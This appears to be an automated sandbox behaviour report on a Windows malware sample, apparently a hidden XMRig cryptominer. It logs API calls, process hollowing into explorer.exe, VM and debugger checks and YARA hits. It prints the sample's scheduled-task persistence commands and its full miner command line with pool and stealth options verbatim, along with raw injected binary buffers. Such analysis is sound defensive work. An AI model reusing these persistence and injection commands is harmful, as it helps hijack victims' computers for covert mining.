ShellExecuteExW Nov. 4, 2021, 3:23 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Nov. 4, 2021, 3:23 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\services64.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\services64.exe	1	1
ShellExecuteExW Nov. 4, 2021, 3:27 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Nov. 4, 2021, 3:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe parameters: filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe	1	1
ShellExecuteExW Nov. 4, 2021, 3:27 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Nov. 4, 2021, 3:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\services32.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\services32.exe	1	1
ShellExecuteExW Nov. 4, 2021, 3:28 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Nov. 4, 2021, 3:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe parameters: filepath: C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (6 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 4, 2021, 3:28 p.m.	snapshot_handle: 0x00000000000001fc process_name: pw.exe process_identifier: 2076	1	1
Process32NextW Nov. 4, 2021, 3:28 p.m.	snapshot_handle: 0x00000000000001fc process_name: taskhost.exe process_identifier: 2296	1	1
Process32NextW Nov. 4, 2021, 3:28 p.m.	snapshot_handle: 0x00000000000001fc process_name: services32.exe process_identifier: 2480	1	1
Process32NextW Nov. 4, 2021, 3:28 p.m.	snapshot_handle: 0x00000000000001fc process_name: conhost.exe process_identifier: 1584	1	1
Process32NextW Nov. 4, 2021, 3:28 p.m.	snapshot_handle: 0x00000000000001fc process_name: pw.exe process_identifier: 1176	1	1
Process32NextW Nov. 4, 2021, 3:29 p.m.	snapshot_handle: 0x0000000000000220 process_name: taskhost.exe process_identifier: 872	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 4, 2021, 3:28 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x0000e200', u'virtual_address': u'0x00063000', u'entropy': 6.802679828750322, u'name': u'.rsrc', u'virtual_size': u'0x0000e038'}

entropy

6.80267982875

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Nov. 4, 2021, 3:23 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 4, 2021, 3:27 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 4, 2021, 3:27 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 4, 2021, 3:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://xmrig.com/wizard
url	https://xmrig.com/benchmark/%s
url	https://xmrig.com/docs/algorithms

Yara rule detected in process memory (19 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Run a KeyLogger	rule	KeyLogger
description	Escalate priviledges	rule	Escalate_priviledges
description	Perform crypto currency mining	rule	BitCoin
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Checks for the presence of known debug tools	rule	anti_dbgtools
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"'

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Nov. 4, 2021, 3:28 p.m.	process_identifier: 2796 region_size: 7888896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000480	1	0	0

Installs itself for autorun at Windows startup (6 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"'

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW Nov. 4, 2021, 3:29 p.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys service_name: WinRing0_1_2_0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys desired_access: 983551 service_handle: 0x000000000048d900 error_control: 1 service_type: 1 service_manager_handle: 0x000000000048d870	1	4774144	0

Network communications indicative of possible code injection originated from the process explorer.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Nov. 4, 2021, 3:28 p.m.	buffer: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"fentdev","pass":"a=randomx","agent":"XMRig/6.15.2 (Windows NT 6.1; Win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}} socket: 520		0	0

Potential code injection by writing to the memory of another process (6 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $¼ÁÖ}ÒÖ}ÒÖ}ÒÖÍ}ÒÑÛ}Ò×}ÒHÝÒ}ÒÝÖÅ}ÒÝÑß}ÒÝ×@}ÒÖÄ}ÒÓÃ}ÒÖ}Ó¼\|ÒS ÖÒÛÔ\|ÒÑÒ}Ò-×}ÒÖ}E×}ÒÐ×}ÒRichÖ}ÒPEdü°aað"V6¦Aøó0@`x`\ÏIÜÀw°0u0Ðw¸DWFXF(`WF0p6x .texttT6V6 `.rdataÞp6Z6@@.data'+JÞI@À.pdata00uúJ@@_RANDOMXVPwM@`_SHA3_25@ `w &M@`_TEXT_CNQpw 0M@`_TEXT_CNwPM@`_RDATA°wbM@@.rsrc°ÀwdM@@.reloc¸ÐwjM@B base_address: 0x0000000140000000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: HÐ%ÀÿHÁÊ âÀÿÄãûðÐ %ÀÿâÀÿfffffSUWVATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$QHHzHÅHÁè %ÀÿÿIðIÙHÅHÁÍ M3ÀM3ÉM3ÒM3ÛM3äM3íM3öM3ÿHIxfD(AHfD(IXfD(QhfD(YxfD(-fD(5fD(=HÐ%ÀÿHÁÊ âÀÿHì(Ç$ÀÇD$À¿ÇD$ÀßÇD$ÀÿÇD$ ÿÿÿÿëdfffffffffffffffffffffÀÿÿÿÿÀÿÿÿÿððH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QHÄëfffffffHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8fATåfATífATõfATýfAVæfAVîfAVöfAVþHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8ÈX¢æÐÈP¢îÐÈH¢öÐÈ@¢þÐÍáÀÿÿL3HÁÍ H3èÕâÀÿÿL3LL3TL3\L3d L3l(L3t0L3\|8HìÈH\$@LD$8LL$0LT$(L\$ Ld$Ll$Lt$L<$HÁÍ H3èHÝHÁë&ãÿÿÿH\$@L3D$8L3L$0L3T$(L3\$ L3d$L3l$L3t$L3<$HÄÈHL$LLILQLYLa Li(Lq0Ly8HL$fWÄfWÍfWÖfWßf)f)If)Q f)Y0DSUWVATAUAVAWH9HòIèAQ HÝèÞLLNLVL^Lf Ln(Lv0L~8HÅHÆ@H;,$rÈAYA_A^A]A\^_][Ãffffffffffffff@SUWVATAUAVAWHìó$óL$óT$ ó\$0ód$@ól$Pót$`ó\|$póD$óD$óD$ óD$°óD¤$ÀóD¬$ÐóD´$àóD¼$ðH9HòIèAQHì(é-L-ôQXü¡õY FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV/Nå,¶÷;fffffffffffffffffffffDF@ÀHÝHãÿÿ?HÁãHßHEH%ÿÿ?HÁàHÇH$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$LEL¯ïþÿÿL ðþÿÿM3ÈLîþÿÿM3ÐLìþÿÿM3ØL%êþÿÿM3àL-èþÿÿM3èL5æþÿÿM3ðL=äþÿÿM3øHl$ Äâ}D$ ÅýÔmþÿÿÄâ} þÿÿÅ½sÐ ÅµsÑ Å}ôÑÅ5ôØÅ½ôÁÄÁ%só Åýsð ÄA-ÔÓÅÔÀÄâ} aþÿÿÅýïÉÄâ}\þÿÿÅýïÒÄâ}WþÿÿÅýïÛÄâ}%RþÿÿÅýïäÄâ}-MþÿÿÅýïíÄâ}5HþÿÿÅýïöÄâ}=CþÿÿÅýïÿÄb}=öýÿÿÄÁ s÷LÅ}lÁLNÅmlËLVÅ]lÕL^ÅMlßLf Å}máLn(ÅmmëLv0Å]mõL~8ÅMmÿÄÃ=FÁ ÄÃ-FË ÅþF@ÅþN`ÄÃFÕ ÄÃ Fß ÅþÅþ ÄÃ=Fá1ÄÃ-Fë1Åþ¦ÀÅþ®àÄÃFõ1ÄÃ Fÿ1Åþ¶Åþ¾ HÅHÆ@H;l$(HÄ(AYóo$óoL$óoT$ óo\$0óod$@óol$Póot$`óo\|$póDo$óDo$óDo$ óDo$°óDo¤$ÀóDo¬$ÐóDo´$àóDo¼$ðÅøwHÄA_A^A]A\^_][ÃHì(H$Å~t$HD$(H\$0HL$8HT$@Å~oÅ~oÅ~oÅ~oÄA=láÄA-lëÄCFõ ÄÁ}ïÆÄCFõ1ÄÁmïÖÄA=máÄA-mëÄCFõ ÄÁuïÎÄCFõ1ÄÁeïÞÅ~o@ Å~oK Å~oQ Å~oZ ÄA=láÄA-lëÄCFõ ÄÁ]ïæÄCFõ1ÄÁMïöÄA=máÄA-mëÄCFõ ÄÁUïîÄCFõ1ÄÁEïþH$Å~ot$HÄ(Åþ$H$H%ÿÿ?HÁàHÇH$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HÄ(YLLILQLYLa Li(Lq0Ly8fA@fIPfQ`fYpHI@fa@fiPfq`fypóDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\^_][ÃfffffffffffffffffL3L3KL3SL3[L3c L3k(L3s0L3{8Hãÿÿ?HÁãHßfffffffLCHãÿÿ?HÁãHßL¯cL dM3ÈLbM3ÐL`M3ØL%^M3àL-\M3èL5ZM3ðL=XM3øéXffffffff-L-ôQXü¡õY FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV*/Nå,¶÷;ºLÁ3ÀH½ÉHÓâI÷ðÃ base_address: 0x0000000140775000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: ÅøwH\$Ht$H\|$UATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$Hì@Hl$@HåàÅùïÀ3ÿÇELâÇE LòÇE IÁîAäÇEMèÆE HñßÅýE ÅýE@ÅýE`ÅýÅý ÅýÀÅýàMöt>¶DHM HÁHH1L{Hûu HM èñHûHÇIEÇHÆHØIîuÂH×MätLÇ¶2HÿÂÄâ¹÷ÈHùIÀI;Ôrè¶DHU HÂ¹JåÄâù÷ÉH3 ¸HÁà?H3ÏH H1EhHM èxÅüE ÄÁ\|EÅøwHÄ@óDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\]H\$Ht$H\|$ÃLL ÖL/¸HI`Äâ}YA ÅþoI¨ÅþoQÈÅþoYèÅþoaÅþoi(ÅþoqHfÅ}pêNÅUïãÅ]ïÎÅïáÄAïáÄCýÜÅïêÄÃýýNÄÁ=sÔ?ÄAÔÌÄA=ëÁÄCýø9ÄA=ïóÄCýöÅïèÅïïÄÁEsÕ?ÄAÔÅÅ=ëÇÄÁmïÖÄÁ}ïÆÄCøÀÄC%ÝÄAïûÄBíGP ÄÂíEQ ÄÁmëÒÄÁeïßÄBåGXàÄÂåEYàÄÁeëÛÄÁ]ïçÄBÝG ÄÂÝE!ÄÁ]ëäÄÁUïïÄBÕGh ÄÂÕEi ÄÁUëíÄÁMï÷ÄcýÒÄcýÛÄBÍGp@ÄBÍEA@ÄA=ëÆÄÁuïÏÄcýäÄcýírÄBõGxÀÄBõEIÀÄA5ëÏÄÁ sØÄÁ=ßþÄÃ5ÝÄC%ùÄÃ-ëÄC5òÄÃeÛ0ÄCü0ÄÃUé0ÄC õ0ÄÃeÜÀÄCýÀÄÃUíÀÄC óÀÄÁeßßÄÁUßîÄÃñÄC-üÄÁeïÚÄÃMò0ÄCû0ÄÁUïìÄÃMóÀÄCùÀÄÁMß÷ÄÁMïõÄÃýàÄc]ø0ÄÃýÈ9ÄãuÈÀÄÁußÏÄÃ%ÔÄCóÄÃmÕ0ÄC ò0ÄÃmÒÀÄC ôÀÄÁmßÖÄÁmïÑÄãýÿÄãýÛÄãýíÄãýörÄÃâÄCõÄÃ]ä0ÄC ñ0ÄÃ]áÀÄC òÀÄÁ]ßæÅýïÇÄÁuïÈÄÁ]ïãÄÁ}ïMR ÿÈ²ýÿÿÄáù~A ÅþI¨ÅþQÈÅþYèÅþaÅþi(ÅþqHÃfffff$)>-8' =7,+=.?$%:6 8>1',+2 base_address: 0x0000000140776000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: `Û2Û2aÛ2oÛ2¨Û2°Û2ÀÛ2ÐÛ2hÛ2Ü2Ü2Û2 Ü2èÛ20Ü2PÜ2Û2.à2+à2Wà2'à24à2Dà2Tà2$à2\à28à2pà2`à20à2@à2Pà2 à2xà2 base_address: 0x000000014077b000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: 8Ph Àw0Ãw}4VS_VERSION_INFO½ïþ?êStringFileInfoÆ000004b0<CompanyNamewww.xmrig.com@FileDescriptionXMRig miner.FileVersion6.15.2h"LegalCopyrightCopyright (C) 2016-2021 xmrig.com< OriginalFilenamexmrig.exe,ProductNameXMRig2ProductVersion6.15.2DVarFileInfo$Translation°<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x000000014077c000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: @ base_address: 0x000007fffffd5010 process_identifier: 2796 process_handle: 0x0000000000000480	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $¼ÁÖ}ÒÖ}ÒÖ}ÒÖÍ}ÒÑÛ}Ò×}ÒHÝÒ}ÒÝÖÅ}ÒÝÑß}ÒÝ×@}ÒÖÄ}ÒÓÃ}ÒÖ}Ó¼\|ÒS ÖÒÛÔ\|ÒÑÒ}Ò-×}ÒÖ}E×}ÒÐ×}ÒRichÖ}ÒPEdü°aað"V6¦Aøó0@`x`\ÏIÜÀw°0u0Ðw¸DWFXF(`WF0p6x .texttT6V6 `.rdataÞp6Z6@@.data'+JÞI@À.pdata00uúJ@@_RANDOMXVPwM@`_SHA3_25@ `w &M@`_TEXT_CNQpw 0M@`_TEXT_CNwPM@`_RDATA°wbM@@.rsrc°ÀwdM@@.reloc¸ÐwjM@B base_address: 0x0000000140000000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2872 called NtSetContextThread to modify thread in remote process 2796
NtSetContextThread Nov. 4, 2021, 3:28 p.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5371917304 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 2226440 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1997522176 registers.rdx: 8796092846080 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x000000000000047c process_identifier: 2796	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2872 resumed a thread in remote process 2796
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x000000000000047c suspend_count: 1 process_identifier: 2796	1	0	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Nov. 4, 2021, 3:28 p.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

Executed a process and injected code into it, probably while unpacking (50 out of 65 events)

Time & API	Arguments	Status	Return
NtResumeThread Nov. 4, 2021, 3:23 p.m.	thread_handle: 0x00000174 suspend_count: 1 process_identifier: 2412	1	0
CreateProcessInternalW Nov. 4, 2021, 3:23 p.m.	thread_identifier: 2528 thread_handle: 0x000002c4 process_identifier: 2524 current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0 filepath: C:\Users\test22\AppData\Local\Temp\RarSFX0\f1_prot.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\RarSFX0\f1_prot.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\RarSFX0\f1_prot.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002cc	1	1
CreateProcessInternalW Nov. 4, 2021, 3:23 p.m.	thread_identifier: 2952 thread_handle: 0x0000026c process_identifier: 2948 current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0 filepath: C:\Users\test22\AppData\Local\Temp\RarSFX0\f2_prot.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\RarSFX0\f2_prot.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\RarSFX0\f2_prot.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d4	1	1
NtResumeThread Nov. 4, 2021, 3:23 p.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2524	1	0
NtResumeThread Nov. 4, 2021, 3:23 p.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2524	1	0
NtResumeThread Nov. 4, 2021, 3:23 p.m.	thread_handle: 0x0000000000000220 suspend_count: 1 process_identifier: 2524	1	0
CreateProcessInternalW Nov. 4, 2021, 3:23 p.m.	thread_identifier: 2708 thread_handle: 0x00000000000003a4 process_identifier: 2704 current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003ac	1	1
CreateProcessInternalW Nov. 4, 2021, 3:23 p.m.	thread_identifier: 2876 thread_handle: 0x00000000000003d4 process_identifier: 2872 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\services64.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\services64.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\services64.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003e8	1	1
CreateProcessInternalW Nov. 4, 2021, 3:16 p.m.	thread_identifier: 2768 thread_handle: 0x0000000000000060 process_identifier: 2764 current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0 filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread Nov. 4, 2021, 3:27 p.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2872	1	0
NtResumeThread Nov. 4, 2021, 3:27 p.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2872	1	0
NtResumeThread Nov. 4, 2021, 3:27 p.m.	thread_handle: 0x000000000000021c suspend_count: 1 process_identifier: 2872	1	0
CreateProcessInternalW Nov. 4, 2021, 3:27 p.m.	thread_identifier: 3048 thread_handle: 0x00000000000003a8 process_identifier: 3044 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003b0	1	1
CreateProcessInternalW Nov. 4, 2021, 3:28 p.m.	thread_identifier: 2604 thread_handle: 0x00000000000003d8 process_identifier: 2552 current_directory: C:\Users\test22\AppData\Roaming\Microsoft\Libs\ filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003ec	1	1
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x000000000000041c suspend_count: 1 process_identifier: 2872	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x000000000000046c suspend_count: 1 process_identifier: 2872	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x00000000000005c4 suspend_count: 1 process_identifier: 2872	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x00000000000007e8 suspend_count: 1 process_identifier: 2872	1	0
CreateProcessInternalW Nov. 4, 2021, 3:28 p.m.	thread_identifier: 2988 thread_handle: 0x000000000000047c process_identifier: 2796 current_directory: C:\Windows filepath: track: 1 command_line: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=fentdev --pass=a=randomx --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 1 process_handle: 0x0000000000000480	1	1
NtUnmapViewOfSection Nov. 4, 2021, 3:28 p.m.	base_address: 0x0000000140000000 region_size: 8786416697344 process_identifier: 2796 process_handle: 0x0000000000000480		-1073741799
NtAllocateVirtualMemory Nov. 4, 2021, 3:28 p.m.	process_identifier: 2796 region_size: 7888896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000480	1	0
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $¼ÁÖ}ÒÖ}ÒÖ}ÒÖÍ}ÒÑÛ}Ò×}ÒHÝÒ}ÒÝÖÅ}ÒÝÑß}ÒÝ×@}ÒÖÄ}ÒÓÃ}ÒÖ}Ó¼\|ÒS ÖÒÛÔ\|ÒÑÒ}Ò-×}ÒÖ}E×}ÒÐ×}ÒRichÖ}ÒPEdü°aað"V6¦Aøó0@`x`\ÏIÜÀw°0u0Ðw¸DWFXF(`WF0p6x .texttT6V6 `.rdataÞp6Z6@@.data'+JÞI@À.pdata00uúJ@@_RANDOMXVPwM@`_SHA3_25@ `w &M@`_TEXT_CNQpw 0M@`_TEXT_CNwPM@`_RDATA°wbM@@.rsrc°ÀwdM@@.reloc¸ÐwjM@B base_address: 0x0000000140000000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
